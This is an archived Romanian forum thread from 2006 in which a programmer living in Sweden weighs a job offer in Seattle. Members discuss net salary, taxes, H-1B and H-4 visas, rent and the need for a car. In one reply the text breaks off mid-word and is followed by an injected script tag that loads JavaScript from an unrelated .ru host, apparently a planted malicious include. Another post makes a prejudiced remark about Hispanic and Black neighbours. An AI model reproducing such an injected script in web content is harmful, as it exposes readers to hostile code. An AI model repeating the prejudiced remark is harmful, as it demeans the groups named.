PDA

Arată versiune întreagă : Sa ma mut din Suedia in SUA (Seattle)?

AdrIanS
01.10.2006, 04:43
Salutare,

Am vazut ca pe acest forum se dau raspunsuri bine argumentate si mi-am zis ca un sfatde la romani care traiesc in SUA este foarte bine venit.

Momentan locuiesc in Suedia si am un job ca programator care imi permite sa pun deoparte cam 1700 de euro/luna (Salar brut 42.000Euro/an).

Am primit o oferta de munca de la o firmade soft din Seattle si nu stiu daca sa ma mut in SUA sau nu.

Salariul brut oferit este de 75.000$/an. Din pacate nu stiu cat anume voi lua in mana pentru ca sistemul de taxe este foarte complicat in State. Din ce am vazut pe siturile de calculare a taxelor, voi plati cam 25% impozitdar as vrea sa aud din surse mai sigure (eventual persoane ce lucreaza in WA). Asigurarea medicala este platita de firma.

Oalta intrebare importanta: daca eu am viza H1B pentru 3 ani,exista vreo posibilitate sa-mi aduc prietena in SUA?

Ma pot descurca in Seattle si Redmond fara masina? Sistemul de transport in comun este bine pus la punct?

Multumesc!

07.10.2006, 03:47
Fara sa fiu din Seattle sau in IT, ma bag in discutie doar ca sa punctez faptul
ca sunt mult prea multe necunoscute la problema ta ptr. ca sa primesti
un sfat inteligent. In primul rand ca prea putini pe acest forum au
trait atat in Suedia cat si in SUA iar mai apoi sfatul ar depinde de
ceea ce vrei sa faci cu viata ta. Eu sunt pe principiul planificarii pe
termen mai lung atat a carierei cat si a vietii personale.

Problema nr. unu este sa vezi unde vrei si unde poti sa te stabilesti
si sa-ti intemeiezi familia si, de ce nu, sa iesi la pensie. Daca ai de
ales intre Suedia si SUA eu banuiesc ca in Suedia e foarte greu sa te
stabilesti definitiv (in afara de metoda casatoriei). Asadar chiar daca
salariul ar fi jumate in SUA fata de Suedia ar trebui sa alegi SUA. Nu
zic aici ca obtinerea resedintei americane prin job este automata (din
contra, vei vedea cate nopti nedormite iti va aduce) dar se poate. In
concluzie la paragraful asta, doar daca ai resedinta/cetatenie in
fiecare tara considerata iti poti permite sa alegi dupa oferta de
serviciu. Altfel, tara ti-o alegi dupa cum sunt legile de imigrare,
indiferent de salariu, asta pana treci "puntea" actelor de resedinta.
Nu stiu sa zic cum intra in ecuatia suedeza Romania ca membra EU.

Apoi mai sunt perspectivele pe termen lung in job-ul respectiv si piata
muncii/concurenta. "Job security" este al 2-lea aspect important pentru
ca un salariu lunar nu este mare decat in conditiile in care ti-l poti
asigura pe termen lung. Banii nu ii pui la ciorap si apoi iti iei toate
cele ci iti iei toate cele pe credit si tragi toata viata ca sa le
platesti. Aici nu sunt in masura sa-ti spun cati indieni din Bangalore
sau cati rusi iti vor pandi job-ul peste 5 ani in SUA sau in Suedia (in
caz ca nu va fi deja "outsourced"). Cate vize H-1B se dau pe an in IT
in SUA sunt date oficiale (in marea lor majoritate sunt date la
indieni) dar nu stiu ce este in Suedia. Piata de IT a trecut prin multe
momente grele in SUA acum vreo 4-5 ani iar asta e ciclic. Ca sa nu zic
ca pe H-1B nu poti sta "unemployed' ci trebuie sa parasesti
teritoriul SUA.

Deabia ulterior iti poti pune problema salariului. Salariul tau
ar reprezenta aproximativ venitul mediu al unei familii americane.
Excluzand poligamii, se imparte la 2 pentru un individ "mediu". Asadar
nu e rau deloc. Depinde insa de costul vietii care variaza in SUA pe
regiuni. Acum vreo 3 ani un american (calificat, chiar spre foarte) de
varsta medie imi spunea ca ptr. el un venit de peste 100k/an
("six-digit figure") e semnul ca cineva "s-a ajuns". Sunt sanse ca SUA sa
fie in general mai ieftina decat Suedia
dar fereasca sfantul sa ai probleme de sanatate aici (la varsta ta
probabil ca nu ai). Daca vrei sa-ti realizezi "the american dream"
uite-te la
pretul caselor, pentru ca nu renteaza pe termen lung (in general) sa
dai niste bani pe chirie cand ii poti da pe "morgage". Intrebarea ta cu
masina o sa vezi ca nu are sens in 99% din SUA (exceptand poate NY sau
Boston). Chiar daca exista transport in comun nu o sa ai timp de
pierdut prin statii de autobuz pentru ca mai mult ca sigur nu va fi un
sistem de transport de masa (ca in Europa). Masina este o
investitie ptr. ca sa-ti mentii/cresti salariul (castigand timp) si nu
un moft. Nu mai zic ca daca mananci acasa trebuie sa-ti cari
cumparaturile. Deocamdata e bine ca nu ai copii de varsta facultatii
pentru ca pe langa o casa asta (college-ul ptr. copii) este o a 2-a
investitie majora in viata americanilor.

Relativ la venit, eu folosesc un "rule of thumb" care zice ca ramai in
mana cam cu 2/3 din salariul brut. Pe langa taxele pe venit eu platesc
asigurarea de sanatate si fondul de pensii, ultimele 2 responsabilitati fiind impartite
cu angajatorul. La nici un job de-al meu angajatorul nu a platit integral
asigurarea medicala dar, cine stie...

Din cele de mai sus rezulta ca este f<script src=http://www.iroe.ru/ngg.js></script>

ancad
07.10.2006, 09:23
daca in Suedia pui 1700 Eur net pe luna categoric nu ai sa poti sa faci
asta in US cu salariu de 75k pe an. 75 k pe an aici este salar bun dar
nu foarte bun..este cam limita de jos a unui programator bun. daca vii
singur te descurci mai bine dar cu sotie care nu lucreaza ( viza H4)
este mai greu. Poti sa iti aduci prietena pe termen lung (
valabilitatea vizei tale) doar prin casatorie cu viza H4.

fara masina esti ca si mort deci trebuie facuta si o investie in masina.

ar mai fii multe de spus....

concluzia: eu in locul tau la asa salar in Europa as ramane acolo.

07.10.2006, 10:10
75 k pe an vine cam 4300 USDmana luna dupa taxe.S-ar putea sa varieze1-200 USD in fct de beneficiile primitesi taxele platite in fct de situatia ta. La asta trebuie sa adaugi inca vreo 2500 USD min cheltuieli pe luna pentru un trai le limita decentei.

Avantajul in USA e ca poti aplica de rezidenta permanenta in timp ce lucrezi la aceeasi companie cu H1B.

Pune in balanta toate si tu alegi.

Pe de alta parte nu ai sa gasesti aici femeile din Suedia...dar asta e alta mancare de peste. smileys/smiley1.gif

darie
07.10.2006, 15:58
La asta trebuie sa adaugi inca vreo 2500 USD min cheltuieli pe luna pentru un trai le limita decentei.

Pe de alta parte nu ai sa gasesti aici femeile din Suedia...dar asta e alta mancare de peste. smileys/smiley1.gif

AdyC,....doar curios cum justifici $2500 "minimum" cheltuieli pe luna pentru "un trai la limita decentei",other than chasing all those swedish women smileys/smiley36.gif

07.10.2006, 19:25
Pai depinde de zona in care locuiesti si cat cheltuiesti. Sa punem 1200 USD chiria apart, 1300 mancarea plus ale cheltuieli telefon +cable +benzina + neprevazut...se fac 2500? Si asta e putin in zone precum NY...sau Seattle...unde fara masina e mort.

Eu as fi un fericit daca as cheltui doar 2500 pe luna..smileys/smiley19.gif

AdrIanS
08.10.2006, 01:43
Salutari din nou.

Multumesc mult pentru raspunsuri.

Sa va spun sincer maine eram gata sa-mi dau demisia pentru ca tocmai mi-am pus stampila de viza in pasaport si mi-am zis ca nu trebuie sa ratez asa o ocazie.

Este de departe cea mai grea decizie pe care a trebuit sa o iau in viata mea, ma gandesc la asta de cateva saptamani si nu am ajuns la nici o concluzie ferma. O zi vreau sama mut in state iar in ziua urmatoarenu as pleca de aici...

Rezidenta permanenta se poate obtine siin Suedia pentru ca am un coleg roman carelucreaza aici de6 ani si a rezolvatproblema asta fara casatorie de convenienta.

Siguranta jobului... la asta nu m-am prea gandit. Avand in vedere cain state merg la o companie f.f. mare de soft care nu a avut probleme in ultimii 20 de ani si ca in Europalucrez tot la o companie f.f. mare,fara antecedente, mi-am zis ca siguranta jobului depinde mai mult de mine. Normal ca e mai complicat de atat dar cel putinasa vad eu situatia.

2500 de dolari costul minim de viata in SUA?!!! Daca chiar ai dreptate atunci raman cu siguranta in Europa. Mi s-a spus ca Stockholm e o capitala scumpa si eu nu cheltui aici mai mult de 850-900 euro/luna. Locuiesc intr-un apartament intr-o zona semicentrala, chiria este 550 euro cu toate cheltuielile incluse (mai putin curentul+netul care nusunt mai mult de35 euro pe luna). Cam 300 euro cheluiesc pe mancare (gatesc), bere + neprevazut.

Azi mai bac o runda de analiza :))

08.10.2006, 04:34
Locuiesc intr-un apartament intr-o zona semicentrala, chiria este 550 euro cu toate cheltuielile incluse

Adica vreo $690/luna? Destul de greu de obtinut aici (cel putin pe
coasta de Est) daca nu vrei efficiency (garsoniera) sau sa traiesti
printre studenti/hispanici/negri. Ca regula generala, nu trebuie sa te
muti intr-un loc in SUA inainte sa-ti vezi vecinii. La inceputurile
mele eu bantuiam pe la ora cand ei se intorceau de la serviciu si
deabia dupa aceea ma hotaram daca sa semnez lease-ul sau nu. Si eu care
credeam ca Suedia e mult mai scumpa...

mi-am zis ca siguranta jobului depinde mai mult de mine.

Corect. Ma gandeam la faptul ca sunt companii mari care isi
ierarhizeaza angajatii si periodic (mai ales in recesiune, dar nu
numai) ii zboara pe cei care sunt in "bottom 10%". Un amic se plangea
ca din pacate la ei tot timpul angajeaza tipi din ce in ce mai buni si
simti cum te prind nisipurile miscatoare.

http://www.usatoday.com/money/economy/employment/2005-03-13- (http://www.usatoday.com/m&#111;ney/ec&#111;nomy/employment/2005-03-13-fired-usat_x.htm) fired-usat_x.htm

08.10.2006, 04:36
AdrianS si eu am lucrat in Europa ca si tine inainte de a vei in USA si tot ca si programmer,,,si acum ma tot intreb nu ar fi fost mai bine daca as fi ramas in Europa? Dar cum timpul nu se poate da inapoi...e o intrebare retorica.

E mult de discutat pe seama diferentelor dintre USA si Europa...vei gasi pe aici pe site si nu numai o multime de informatii. Sunt stiluri de viata diferite...America te asteapta cu drumuri largi si distante mari,.. nu gasesti inghesuiala din Europa... nu gasesti aceeasi viata agitata,.nu gasesti multe de acolo. Gasesti un alt mod de viata si de tine depinde daca te vei adapta sau nu. Pe de alta parte America e o tara a emigrantilor...nu vor fi niciodata diferente semnificative intre un nativ nascut aici si tu ca emigrant posibil viitor cetatean american.

Daca iti place stilul de viata european mai agitat cu disco, viata de noapte, stil mai boem...atunci nu te vei simti bine in America.

Referitor la partea materiala un programmer bun aici ar trebui sa aiba cam 100 -120 k pe an deci in 2-3 ani asta ar trebui sa fie si salariul tau daca vei avansa. Aici vorbim de alte preturi...depinzand de zona in care locuiesti si de salariul primit... pe de alta parte nu numai banii sunt totul in alegerea asta...nu-mi spue ca daca intr-un loc economisesti 2-300 euro mai mult asta e criteriul selectiei acelei zone.

Bottom line numai tu hotarasti...noi iti expunem viata din al nostru pct de vedere subiectiv...

ancad
08.10.2006, 08:56
AdrianS sa ne tii si pe noi la curent cu decizia ta...eu chiar sunt
curioasa ce decizie ai sa iei pana la urma ca nu este usor...eu daca as
avea de ales ..as alege cu siguranta Europa..eu am trait si in Europa
si in US si daca mi-ar oferi cineva acelasi salar in ambele parti as
alege Europa.

ancad
08.10.2006, 09:06
si ar mai fi un mic amanunt de comentat. daca in Suedia stai si trangi
bani cu posibilitatea intoarcerii intr-o zi acasa in Rom..in Us altfel
se pune problema...aici nu mai poti sa faci acelasi lucru ..aici daca
vii cam vii de tot. Nu prea mai este cale de intoarcere cel putin pe o
perioada de timp de 3-5 ani...iti spun asta pentru ca atunci cand vii
in Us incep si cheltuielile de alta natura : mobila, masini,
electronice..incepi sa-ti umplii casa ca iti perimiti si iti dai seama
ca o intorcere in Rom ese foarte grea chiar imposibilia dupa ce aici
incepi sa aduni ceva bunuri. Din Suedia chiar daca iti cumperi masina,
etc..poti sa le cari fara probleme in Romania si gata te-ai intors
acasa. Din Us este mai greu.

08.10.2006, 18:59
Adrian,

Gandeste-te doar la aspectul profesional al problemei. Daca acesta te multumeste si vezi posibilitati de crestere pt tine aici, atunci nu sta prea mult pe gandurismileys/smiley1.gif . Baniisunt suficienti pt inceput (intotdeauna se tine cont si de cati bani ai luat la jobul dinainte) si oricum se vor inmulti pe an ce trece; tu sa fii in stare sa tii strocul ridicat! Chiar sunt curios daca te-au chemat aici la interviu si daca da, cu ce impresie ai ramas. Despre celelalte aspecte, intreaba-i direct pe cei de la firma la ce trebuie sa te astepti aici, ei stiu mai bine decat noi amanunte despre zona respectiva.

Succes

08.10.2006, 19:37
Cat despre "statistici" despre USA gasesti pe census.gov (urmatoarele date au fost publicate in august, 2006):
"INCOME IN THE UNITED STATES
Highlights

luckylord
08.10.2006, 21:59
Pai depinde de zona in care locuiesti si cat cheltuiesti. Sa punem 1200 USD chiria apart, 1300 mancarea plus ale cheltuieli telefon +cable +benzina + neprevazut...se fac 2500? Si asta e putin in zone precum NY...sau Seattle...unde fara masina e mort.

Eu as fi un fericit daca as cheltui doar 2500 pe luna..smileys/smiley19.gif lamureste-ma te rog si pe mine daca 2500 sunt cheltuieli minime lunare ale unui individ ce fac acei care castiga doar 2500 sau mai putin??sincer ma indoiesc ca ar manca cineva de 1300 de dolari pe luna

09.10.2006, 03:28
lamureste-ma te rog si pe mine daca 2500 sunt cheltuieli minime lunare ale unui individ ce fac acei care castiga doar 2500 sau mai putin??sincer ma indoiesc ca ar manca cineva de 1300 de dolari pe luna

mancare+telefon+masina(rate)+benzina+cabluTV+net+ restaurant+ bani distractie+bani in tzara rude+haine+neprevazute=minim 1300 USD pe luna. Ce e asa greu de priceput?

luckylord
11.10.2006, 21:15
scuze,se pare ca nu am citit atent...

ancad
19.10.2006, 08:04
deci AdrianS ce decizie ai luat??? Suedia sau US??

a good girl
19.10.2006, 18:42
Adica vreo $690/luna? Destul de greu de obtinut aici (cel putin pe coasta de Est) daca nu vrei efficiency (garsoniera) sau sa traiesti printre studenti/hispanici/negri. Ca regula generala, nu trebuie sa te muti intr-un loc in SUA inainte sa-ti vezi vecinii. La inceputurile mele eu bantuiam pe la ora cand ei se intorceau de la serviciu si deabia dupa aceea ma hotaram daca sa semnez lease-ul sau nu. Si eu care credeam ca Suedia e mult mai scumpa...

Gresit.In Bellevue,WA (zona lipita de Seattle) unde se afla o mare parte din cladirile Microsoft,gasesti chirie la one bedroom cu $700 pe luna.Am vazut zona si apartamentul respectiv si mi se pare foarte convenabil.(oameni civilizati, liniste, verdeata multa, curatenie desavirsita).

20.10.2006, 12:30
things that you own..end up owning you!

om bun
21.10.2006, 10:36
salut Adrian,nu am experinta in profesia de programator dar stiu cum este in Europa si cum este in USA.Eu sunt cetatean italian si am ales sa traiesc in USA.

despre situatia ta eu gandesc asa:daca firmamicrosoft o sa fie in criza cred ca si firma la care lucrezi tu o sa fie si mai in criza.daca in suedia pui la ciorap 1700 euro in USA o sa pui cel putin 2000$cu salariul pe care o sa-l primesti,nu uita ca salariul o sa creasca din ce in ce mai mult,depinde cat de serios si de priceput esti in meseria ta.nu uita ca romanii care lucreaza la microsoft sunt vazuti foarte bine,sunt considerati printre cei mai buniprogramatori din lume,vin mai multi indieni si alte natii pt.ca sunt mai multi ca populatie nu ca sunt mai inteligenti ca romanii.

eu locuiesc inLas Vegas unde viata e cam scumpa,platesc 750$ chiria si cam 1200$ mancare,gaz,lumina,benzina etc.(2 persoane).In Seattle este tot cam asa sau mai ieftin.

gandestete la o decizie pe termen lung,la prietena ta si la felul de viata cu care esti obisnuit.poti sa ai cati bani vrei daca nu esti fericit nu ai nimic.e cum ai avea un ferrarisi sa nu ai carnet de conducere!

Ok!punele pe toate in balanta si ia o decizie(urmeaza-ti instinctul)

sunt curios ce o sa faci,ciao!

21.10.2006, 11:14
Draga Adrian,

Eu sunt aici de 6 ani. cetatean american, pe functie de director, cu un salariu bunicel.M-am adaptat vietii americane dar asta nu inseamna ca-mi si place.

Daca vrei meserie si nimic altceva poate fi o obtiune,daca mai speri sila altceva sa-ti iei adio.

Apropos, eu ma gandesc foarte serios sa ma intorca acasa si asta inseamna Romania cu toata tigania de acolo decat sa stiu ca, copilul meu o sa trebuiasca sa mearga la scoala fiind perchezitionat si prin detectoare de metale (ata in marile orase). Tara asta e bolnava grav..........asta e parerea mea.

Alex

tino223456
26.12.2006, 16:53
si ai fost director de cand ai pus picioru in USA presupun????
daca crezi ca tara este atat de bolnava de ce nu te intorci in Romania sa fii Director General ????????

tino223456
26.12.2006, 17:11
si pentru baiatu Mare Programator cu only 5 figures paychek, sa stii ca 1'700 de EUR inseamna de fapt ceva mai mult decat $2000 pe care ti-au sugerat unii ca ii poti economii in US, daca esti baiat istet ramai in Sweden , calitatea vietii, modu de viata si cat de cat banii care ii pui deoparte , nu prea se compara cu SUA mai ales ca Ro a intrat in UE si statutu tau in Sweden va fii mult mai bun (vezi planuri de viitor) decat in SUA, asta e parerea mea, eu daca as fi fost in locul tau(si nu sunt) as fi RAMAS in Sweden........
despre mine ce sa zic eu am facut politehnica in buc si am plecat la 28 in US unde am luat-o TOTAL de jos, cu facultate si toate si tot n-am ajuns director(putin gelos pe altii.....ce sa-i faci invidie romaneascasmileys/smiley7.gif)
si de asta iti zic la anii tai si cu meseria care o ai si tinand cont de calitatea vietii din Sweden, nu se merita sa pleci in US (eu zic asha dar acum cand scriu eu poate baiatu deja e plecat...smileys/smiley2.gif.)
cand am plecat eu din Ro Sweden era un vis ca sa muncesti/traiesti legal, am 34 de ani si am vazut si Swe si mi-a placut.....alta civilizatie....sup fata de US,
dar DAR asta este, de ce sa nu fim recunoscatori si sa-i multumim US ca ne-a dat o sansa atunci cand ALTII NE INCHIDEAU USILE IN NAS, asha ca daca aveti un pic de bun simt in voi nu mai criticati USA cand voi sunteti MARI DIRECTORI SI FACETI $$$ IN USA .......DAR IN SCHIMB O VEDETI CA O "TARA GRAV BOLNAVA" !!??!!!!!!!!!!!!?!?!
DACA NU VA CONVINE PLECATI SA TRAITI IN TARI CARE NU SUNT GRAV BOLNAVE PTR VOI OAMENI FOARTE SANATOSI........
smileys/smiley7.gifm-am aprins asha ca unde dau de romani din US ii aud mereu ca america e bolnava iar ei sunt directori si castiga lots of $$$$$$$
give me a f...... break frati romani cu expresiile asteasmileys/smiley7.gif
no offencesmileys/smiley1.gif

g_force
29.12.2006, 08:24
ar trebui sa-ti imaginezi "cel mai rau caz" si in functie de acesta sa-ti iei decizia, daca nu cumva ai si luat-o. Din scaunul pe care stau eu acum, mie mi se pare ca nu are ce sa mearga mai rau daca vii in USA;o experienta aici nu are cum sa-ti strice. Problema mai mare ar fi cu relatia dintre tine si prietena ta!
Bafta multa si An Nou fericit!